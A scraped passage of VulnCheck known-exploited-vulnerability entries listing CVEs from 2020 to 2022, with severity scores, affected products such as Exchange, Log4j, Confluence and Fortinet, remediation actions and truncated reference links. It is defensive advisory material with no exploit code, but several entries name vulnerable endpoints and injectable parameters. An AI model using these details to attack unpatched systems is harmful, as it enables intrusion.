Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-21&host_type=src&vulnerability=cve-2022-36553; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-02-12&host_type=src&vulnerability=cve-2022-36553; https://dashboard.shadowserver.org/statistics/honeypot/vuln
VulnCheck
Fortinet Multiple Products Authentication Bypass Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-40684 [CRITICAL] CWE-288 Fortinet Multiple Products Authentication Bypass Vulnerability
Fortinet FortiOS, FortiProxy, and FortiSwitchManager contain an authentication bypass vulnerability that could allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Affected: Fortinet Multiple Products
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.fortiguard.com/psirt/FG-IR-22-377; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2022-40684; https://blog.cyble.com/2022/11/24/multiple-organisations-compromised-by-critical-authentication-bypass-vulnerability-in-fortinet-pro
VulnCheck
HP edgeline_infrastructure_manager Missing Authentication for Critical Function
vulncheck·2021·CVSS 9.8
CVE-2021-29203 [CRITICAL] HP edgeline_infrastructure_manager Missing Authentication for Critical Function
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
Affected: HP edgeline_infrastructure_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
VulnCheck
wptaskforce wpcargo_track_&_trace Improper Control of Generation of Code ('Code Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-25003 [CRITICAL] wptaskforce wpcargo_track_&_trace Improper Control of Generation of Code ('Code Injection')
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
Affected: wptaskforce wpcargo_track_&_trace
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-30&host_type=src&vulnerability=cve-2021-25003; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-03&host_type=src&vulnerability=cve-2021-25003; https://dashboard.shadowserver.o
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-28481 [CRITICAL] Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server Remote Code Execution Vulnerability
Affected: Microsoft Exchange Server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/scanning-for-credentials-and-botpoke-changes-ips-again; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-
VulnCheck
Laravel Ignition File Upload Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-3129 [CRITICAL] Laravel Ignition File Upload Vulnerability
Laravel Ignition contains a file upload vulnerability that allows unauthenticated remote attackers to execute malicious code due to insecure usage of file_get_contents() and file_put_contents().
Affected: Laravel Ignition
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/; https://blog.talosintellige
VulnCheck
maianscriptworld maian_cart Missing Authorization
vulncheck·2021·CVSS 9.8
CVE-2021-32172 [CRITICAL] maianscriptworld maian_cart Missing Authorization
Maian Cart v3.8 contains a pre-authentication remote code execution (RCE) vulnerability via a broken access control issue in the Elfinder plugin.
Affected: maianscriptworld maian_cart
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Samsung Mobile Devices Improper Access Control Vulnerability
vulncheck·2021·CVSS 4.4
CVE-2021-25369 [MEDIUM] CWE-200 Samsung Mobile Devices Improper Access Control Vulnerability
Samsung mobile devices using the Mali GPU contain an improper access control vulnerability in the sec_log file. Exploitation of the vulnerability exposes sensitive kernel information to userspace. This vulnerability was chained with CVE-2021-25337 and CVE-2021-25370.
Affected: Samsung Mobile Devices
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; http
VulnCheck
cyberoamworks netgenie_c0101b1-20141120-ng11vo_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2021·CVSS 6.1
CVE-2021-38702 [MEDIUM] cyberoamworks netgenie_c0101b1-20141120-ng11vo_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow tweb/ft.php?u=[XSS] attacks.
Affected: cyberoamworks netgenie_c0101b1-20141120-ng11vo_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 7.8
CVE-2021-27065 [HIGH] CWE-39 Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution. This vulnerability is part of the ProxyLogon exploit chain.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers; https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/; https://us-cert.cisa
VulnCheck
Atlassian Jira Server and Data Center Path Traversal Vulnerability
vulncheck·2021·CVSS 5.3
CVE-2021-26086 [MEDIUM] CWE-22 Atlassian Jira Server and Data Center Path Traversal Vulnerability
Atlassian Jira Server and Data Center contain a path traversal vulnerability that allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
Affected: Atlassian Jira Server and Data Center
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-23&host_type=
VulnCheck
Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-26084 [CRITICAL] CWE-917 Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
Atlassian Confluence Server and Data Center contain an Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute code.
Affected: Atlassian Confluence Server and Data Center
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/; https://cybersecurityworks.com/blog/vulnerabilities/cve-2021-26084-patch-the-confluence-servers-now.html; https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/; https://www.lacework.co
VulnCheck
dragonfly_project dragonfly Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-33564 [CRITICAL] dragonfly_project dragonfly Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
Affected: dragonfly_project dragonfly
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-29&host_type=src&vulnerability=cve-202
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.1
CVE-2021-34473 [CRITICAL] CWE-918 Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cybereason.com/blog/threat-alert-microsoft-exchange-proxyshell-exploits-and-lockfile-ransomware; https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html; https://www.securin.io/microsoft-exchange-proxyshell-and-windows-petitpotam-vulnerabilities-chained-in-new-attack/; https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/; https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-ac
VulnCheck
raspap raspap Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-33357 [CRITICAL] raspap raspap Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
Affected: raspap raspap
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attacks-trends-august-october-2021/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-33357; https://dash
VulnCheck
advantech r-seenet Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2021·CVSS 6.1
CVE-2021-21801 [MEDIUM] advantech r-seenet Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
This vulnerability is present in the device_graph_page.php script, which is part of the Advantech R-SeeNet web application. A specially crafted URL built by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
Affected: advantech r-seenet
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scannin
VulnCheck
Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-40539 [CRITICAL] CWE-55 Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability
Zoho ManageEngine ADSelfService Plus contains an authentication bypass vulnerability affecting the REST API URLs that allows for remote code execution.
Affected: Zoho ManageEngine
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine-adselfservice; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2021-40539; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/; https://www.microsoft.com/en-us/security/blog/2021/11/08/threat-actor-dev-03
VulnCheck
Apache Log4j2 Remote Code Execution Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
Affected: Apache Log4j2
Required Action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa21-336a; https://api.vulncheck.com/v3/index/sans-dshield?cve=
VulnCheck
beyondtrust appliance_base_software Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2021·CVSS 6.1
CVE-2021-31589 [MEDIUM] beyondtrust appliance_base_software Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization.
Affected: beyondtrust appliance_base_software
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.co
VulnCheck
Metabase GeoJSON API Local File Inclusion Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-41277 [CRITICAL] CWE-200 Metabase GeoJSON API Local File Inclusion Vulnerability
Metabase contains a local file inclusion vulnerability in the custom map support in the API to read GeoJSON formatted data.
Affected: Metabase Metabase
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-security-trends-cross-site-scripting/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2021-41277; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2021-41277; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&
VulnCheck
VMware vCenter Server Improper Input Validation Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-21985 [CRITICAL] CWE-20 VMware vCenter Server Improper Input Validation Vulnerability
VMware vSphere Client contains an improper input validation vulnerability in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server, and which allows for remote code execution.
Affected: VMware vCenter Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/06/04/unpatched-vmware-vcenter-software; https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.tenable.com/blog/contileaks-chats-reveal-over-30-vulnerabilities-used-by-conti-ransomware-affiliates; https://cybersecurityworks.com/
VulnCheck
System Information Library for Node.JS Command Injection
vulncheck·2021·CVSS 7.1
CVE-2021-21315 [HIGH] CWE-78 System Information Library for Node.JS Command Injection
An attacker can send a malicious payload that exploits the name parameter. After successful exploitation, attackers can execute commands remotely.
Affected: Npm package System Information Library for Node.JS
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=cve-2021-21315; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-17&host_type=src&vulnerability=cve-2021-21315; htt
VulnCheck
std42 elfinder Unrestricted Upload of File with Dangerous Type
vulncheck·2021·CVSS 8.1
CVE-2021-23394 [HIGH] std42 elfinder Unrestricted Upload of File with Dangerous Type
The package studio-42/elfinder before 2.1.58 is vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP.
Affected: std42 elfinder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://app.crowdsec.net/cti/cve-explorer/CVE-2021-23394
VulnCheck
NETGEAR rax43 Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2021·CVSS 8.0
CVE-2021-20167 [HIGH] NETGEAR rax43 Improper Neutralization of Special Elements used in a Command ('Command Injection')
Netgear RAX43 version 1.0.3.96 contains a command injection vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter.
Affected: NETGEAR rax43
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-fo
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.1
CVE-2021-26855 [CRITICAL] CWE-918 Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution. This vulnerability is part of the ProxyLogon exploit chain.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers; https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/; https://us-cert.cisa
VulnCheck
binatoneglobal halo+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 8.8
CVE-2021-3577 [HIGH] binatoneglobal halo+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
Affected: binatoneglobal halo+_camera_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-3577; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vu
VulnCheck
podlove podlove_podcast_publisher Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-24666 [CRITICAL] podlove podlove_podcast_publisher Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The Podlove Podcast Publisher WordPress plugin before 3.5.6 contains a 'Social & Donations' module (not activated by default), which adds the REST route '/services/contributor/(?P<id>[\d]+)' and takes 'id' and 'category' parameters as arguments. Both parameters can be used for SQL injection.
Affected: podlove podlove_podcast_publisher
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
gpononu 1ge_router_wifi_onu_v2801rw_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 7.2
CVE-2020-8958 [HIGH] gpononu 1ge_router_wifi_onu_v2801rw_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the boaform/admin/formPing Dest IP Address field.
Affected: gpononu 1ge_router_wifi_onu_v2801rw_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; htt
VulnCheck
Oria GridX 1.3 tests/support/stores/test_grid_filter.php Remote Code Execution
vulncheck·2020·CVSS 9.8
CVE-2020-19625 [CRITICAL] Oria GridX 1.3 tests/support/stores/test_grid_filter.php Remote Code Execution
A remote code execution vulnerability in tests/support/stores/test_grid_filter.php in Oria GridX 1.3 allows remote attackers to execute arbitrary code via a crafted value for the $query parameter.
Affected: gridx_project gridx
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-27&host_type=src&vulnerability=cve-2020-19625; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2020-19625; https://dashboard.shadowserver.org/statistics/
VulnCheck
D-Link DCS-2530L and DCS-2670L Devices Unspecified Vulnerability
vulncheck·2020·CVSS 7.5
CVE-2020-25078 [HIGH] D-Link DCS-2530L and DCS-2670L Devices Unspecified Vulnerability
D-Link DCS-2530L and DCS-2670L devices contain an unspecified vulnerability that could allow for remote administrator password disclosure. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
Affected: D-Link DCS-2530L and DCS-2670L Devices
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/th
VulnCheck
netsweeper netsweeper Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-13167 [CRITICAL] netsweeper netsweeper Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
Affected: netsweeper netsweeper
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2020-13167; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_ty
VulnCheck
vBulletin PHP Module Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 vBulletin PHP Module Remote Code Execution Vulnerability
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.
Affected: vBulletin vBulletin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_
VulnCheck
Multiple DrayTek Vigor Routers Web Management Page Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-8515 [CRITICAL] CWE-78 Multiple DrayTek Vigor Routers Web Management Page Vulnerability
DrayTek Vigor3900, Vigor2960, and Vigor300B routers contain an unspecified vulnerability that allows for remote code execution.
Affected: DrayTek Vigor Routers
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/; https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/; https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/; https://blog.radware.com/security/botnets/2020/05/ghosting-bots-the-story-of-hoaxcalls-failures/; https://blog.netlab.360.com/ddos-botnet-moobot-en/; https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-pay
VulnCheck
WordPress File Manager Plugin Remote Code Execution Vulnerability
vulncheck·2020·CVSS 10.0
CVE-2020-25213 [CRITICAL] CWE-434 WordPress File Manager Plugin Remote Code Execution Vulnerability
WordPress File Manager plugin contains a remote code execution vulnerability that allows unauthenticated users to execute PHP code and upload malicious files on a target site.
Affected: WordPress File Manager Plugin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2020-25213; https://unit42.paloaltonetworks.com/cve-2020-25213/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2020-25213; https://dashboard.shadowserver.org/statis
VulnCheck
avertx hd838_firmware Observable Discrepancy
vulncheck·2020·CVSS 5.3
CVE-2020-11625 [MEDIUM] avertx hd838_firmware Observable Discrepancy
An issue was discovered in AvertX Auto focus Night Vision HD Indoor/Outdoor IP Dome Camera HD838 and Night Vision HD Indoor/Outdoor Mini IP Bullet Camera HD438. Failed web UI login attempts elicit different responses depending on whether a user account exists. Because the responses indicate whether a submitted username is valid or not, they make it easier to identify legitimate usernames. If a login request is sent to ISAPI/Security/sessionLogin/capabilities using a username that exists, it will return the value of the salt given to that username, even if the password is incorrect. However, if a login request is sent using a username that is not present in the database, it will return an empty salt value. This allows attackers to enumerate legi
VulnCheck
WSO2 api_manager Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 6.1
CVE-2020-17453 [MEDIUM] WSO2 api_manager Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter.
Affected: WSO2 api_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2020-17453; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2020-17453; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnerability=cve-202
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-7796 [CRITICAL] CWE-918 Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery vulnerability if the WebEx zimlet is installed and zimlet JSP is enabled.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-12&host_type=src&vulnerability=cve-2020-7796; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-13&host_type=src&vulnerability=cve-2020-7796; https://dashboard.shadowserver.org/statisti
VulnCheck
Liferay Portal Deserialization of Untrusted Data Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-7961 [CRITICAL] CWE-502 Liferay Portal Deserialization of Untrusted Data Vulnerability
Liferay Portal contains a deserialization of untrusted data vulnerability that allows remote attackers to execute code via JSON web services.
Affected: Liferay Liferay Portal
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.imperva.com/blog/python-cryptominer-botnet-quickly-adopts-latest-vulnerabilities/; https://blog.checkpoint.com/2021/01/19/linux-users-should-patch-now-to-block-new-freakout-malware-which-exploits-new-vulnerabilities/; https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/; https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html; https://www.trendmicro.com/en_us/research/21/g/threat-actors-
VulnCheck
Cisco ASA and FTD Read-Only Path Traversal Vulnerability
vulncheck·2020·CVSS 7.5
